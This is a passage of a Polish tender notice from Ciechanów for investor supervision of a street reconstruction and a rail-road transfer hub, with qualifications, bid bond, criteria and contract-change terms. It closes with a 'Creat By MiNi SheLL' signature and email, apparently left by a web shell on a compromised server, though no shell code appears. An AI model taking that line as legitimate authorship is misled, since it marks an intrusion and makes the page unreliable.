10,0 mln zł.
	Inspektor Nadzoru (branża drogowa)  min. 3 lata doświadczenia zawodowego 
w wykonawstwie robót  drogowych lub nadzorach inwestorskich 
Minimum jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej lub odpowiadające im wyższe uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub równoważne.
	Inspektor Nadzoru (branża elektro-energetyczna) - min. 3 lata doświadczenia zawodowego w pełnieniu nadzoru nad robotami branży elektroenergetycznej
Minimum jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności elektro-energetycznej 
w zakresie sieci i instalacji elektrycznych lub odpowiadające im wyższe uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub równoważne.
	Inspektor Nadzoru (branża sanitarna) - min. 3 lata doświadczenia zawodowego 
w pełnieniu nadzoru nad robotami branży sanitarnej i gazowej
Minimum jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności inżynieryjno-instalacyjnej w zakresie sieci i instalacji sanitarnych lub odpowiadające im wyższe uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub równoważne.
	Inspektor Nadzoru (branża konstrukcyjno  budowlana) - min. 3 lata doświadczenia zawodowego w pełnieniu nadzoru nad robotami branży konstrukcyjno-budowlanej.
Minimum jedna osoba, która będzie inspektorem nadzoru inwestorskiego robót konstrukcyjno-budowlanych posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub odpowiadające im wyższe uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub równoważne.

UWAGA:
Zamawiający dopuszcza łączenie funkcji Inżyniera Kontraktu z funkcją Inspektora Nadzoru Inwestorskiego, pod warunkiem wykazania się niezbędnym doświadczeniem 
i uprawnieniami dla Inżyniera Kontraktu oraz Inspektora Nadzoru Inwestorskiego.


<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">1)	W celu potwierdzenia spełniania warunku, o którym mowa w rozdz. X ust. 3 pkt. 2) lit. a) SIWZ :
wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału 
w postępowaniu (załącznik nr 4 do SIWZ)
2)	W celu potwierdzenia spełniania warunku o którym mowa w rozdz. X ust. 3  pkt. 2) lit. b) SIWZ  złoży wykaz osób kierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 5 a, b do SIWZ); 
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Formularz ofertowy, 2. Dowód wniesienia wadium</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Zamawiający wymaga wniesienia wadium w wysokości: 
	Część nr 1: 5 000,00 zł. (słownie pięć tysięcy 00/100 zł.)
	Część nr 2: 9 000,00 zł. (słownie dziewięć tysięcy 00/100 zł.) 
zgodnie z art. 45 ustawy Pzp.

2.	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy:
a.	pieniądzu, przelewem na rachunek bankowy: 
97 1600 1462 1837 0686 3000 0004 Bank BGŻ BNP Paribas S.A.
b.	poręczeniach bankowych;
c.	poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych;
d.	gwarancjach bankowych;
e.	gwarancjach ubezpieczeniowych;
f.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 2016 r. poz. 359).
3.	Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale
 i musi obejmować cały okres związania ofertą.
4.	Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt. 2a) rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert.
5.	W przypadku, gdy wadium wnoszone jest w innej formie niż pieniądz, Wykonawca winien złożyć oryginał gwarancji lub poręczenia w osobnej kopercie dołączonej do oferty, a kserokopię gwarancji lub poręczenia  załączyć (wpiąć) do oferty.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>ilość kontroli na budowie  </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Wszelkie zmiany postanowień umowy wymagają formy pisemnej, pod rygorem nieważności.
2.	Zamawiający przewiduje możliwość dokonania zmiany niniejszej umowy w przypadku zaistnienia ustawowej zmiany powszechnie obowiązujących przepisów prawa, mających wpływ na realizację przedmiotu umowy. 
3.	Zamawiający zgodnie z art. 144 ust. 1 ustawy Pzp przewiduje następujące możliwości dokonania zmiany niniejszej umowy dla każdej z Części zadania inwestycyjnego w zakresie: 
1)	Oznaczenia danych dotyczących Zamawiającego, Inżyniera Kontraktu bądź zatrudniony przez niego personel,
2)	Zmniejszenia wynagrodzenia, zwłaszcza w sytuacji zmniejszenia zakresu umowy. W takiej sytuacji, wynagrodzenie może być zmniejszone wprost proporcjonalnie do procentowego zakresu realizacji robót,
3)	Sposobu realizacji przedmiotu zamówienia, jeżeli zmiany te są korzystne dla Zamawiającego lub nie dało się ich przewidzieć w chwili zawarcia umowy; 
4)	Przedmiotu zamówienia w przypadku wystąpienia zmiany okoliczności powodującej, że:
a)	wykonanie części zakresu robót z Kontraktu nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawierania umowy, 
b)	wykonanie części zakresu robót z Kontraktu nie jest możliwe, z przyczyn nie leżących po stronie Zamawiającego i Inżyniera Kontraktu, przy odpowiednim zmniejszeniu wynagrodzenia, 
5)	Zamawiający przewiduje możliwość zmiany terminu wykonania umowy w przypadku:
a)	jeśli pojawiły się okoliczności, których nie można było przewidzieć w chwili zawierania umowy, zwłaszcza w przypadku wystąpienia potrzeby realizacji robót dodatkowych, 
b)	jeśli dotrzymanie terminu wskazanego pierwotnie okazało się niemożliwe z powodów, za które nie ponosi odpowiedzialności Inżynier Kontraktu, a w szczególności wniesienia przez Zamawiającego istotnej zmiany do projektu, na podstawie którego Inżynier Kontraktu wykonuje przedmiot umowy, lub wyniknięcia podczas realizacji podziemnej sieci nieprzewidzianych kolizji z istniejącymi uzbrojeniem, 
c)	wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających prowadzenie robót objętych Kontraktem,
d)	wystąpienia warunków gruntowych realizacji inwestycji, znacząco odbiegających od opisanych w dokumentacji technicznej i tym samym uniemożliwiających prowadzenie robót objętych Kontraktem,
e)	wstrzymania realizacji projektu przez Zamawiającego z przyczyn nieleżących po stronie Inżyniera Kontraktu, w tym stwierdzenia obecności zabytkowej przestrzeni reliktowej,
f)	wystąpienia opóźnienia w uzyskiwaniu decyzji i uzgodnień wydawanych przez inne organy w stosunku do terminów przewidzianych ustawowo lub w stosunku do innych przepisów, 
g)	skrócenia terminu realizacji za zgodą Zamawiającego, 
h)	W przypadkach, o których mowa w lit. a), b), c), d), e), f)  termin realizacji umowy może ulec zmianie maksymalnie o okres (w dniach), w których trwała przeszkoda w wykonywaniu lub niemożliwym było wykonywanie w określonym terminie.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/04/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Publiczne otwarcie ofert nastąpi o godz. 11:15, w dniu 24.04.2017 r., w Urzędzie Miasta Ciechanów ul. Wodna 1, 06-400 Ciechanów, Sala konferencyjna. </div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Część 1: Nadzór inwestorski nad przebudową ulicy Sienkiewicza w Ciechanowie  w ramach zadania pn.:  Stworzenie warunków do wykorzystania transportu multimodalnego przez budowę w rejonie dworca kolejowego w Ciechanowie drogowo  kolejowego węzła przesiadkowego wraz  z przebudową ulicy Sienkiewicza (droga dojazdowa do dworca PKP) i rozbudową sieci dróg dla rowerów"<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 1: Nadzór inwestorski nad przebudową ulicy Sienkiewicza w Ciechanowie w ramach zadania pn.: Stworzenie warunków do wykorzystania transportu multimodalnego przez budowę w rejonie dworca kolejowego w Ciechanowie drogowo  kolejowego węzła przesiadkowego wraz  z przebudową ulicy Sienkiewicza (droga dojazdowa do dworca PKP) i rozbudową sieci dróg dla rowerów "

Miejsce wykonywania nadzoru inwestorskiego: obszar pasa drogowego ulicy Henryka Sienkiewicza w Ciechanowie od skrzyżowania z ul. Płocką do skrzyżowana z ul. 17-Stycznia
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71247000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/01/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>ilość kontroli na budowie  </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Część 2: Nadzór inwestorski nad budową drogowo  kolejowego węzła przesiadkowego, targowiska miejskiego okresowego i hali targowej  z infrastrukturą położonych przy ul. Sienkiewicza w Ciechanowie.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 2: Nadzór inwestorski nad budową drogowo  kolejowego węzła przesiadkowego, targowiska miejskiego okresowego i hali targowej  z infrastrukturą położonych przy ul. Sienkiewicza w Ciechanowie.
	Zadanie I: Budowa targowiska miejskiego okresowego w Ciechanowie przy ul. Sienkiewicza 
	Zadanie II: Budowa drogowo-kolejowego węzła przesiadkowego - podetap 1. 
	Zadanie III: Budowa hali targowej z infrastrukturą. 
	Zadanie IV: Przebudowa placu przed dworcem kolejowym przy ul. Sienkiewicza w Ciechanowie. Budowa drogowo-kolejowego węzła przesiadkowego - podetap 2. 

Miejsce wykonywania nadzoru inwestorskiego: teren placu targowiska miejskiego i obszaru miejskiego, na którym znajduje się pętla autobusowa przed dworcem kolejowym.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71247000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/05/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>ilość kontroli na budowie  </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com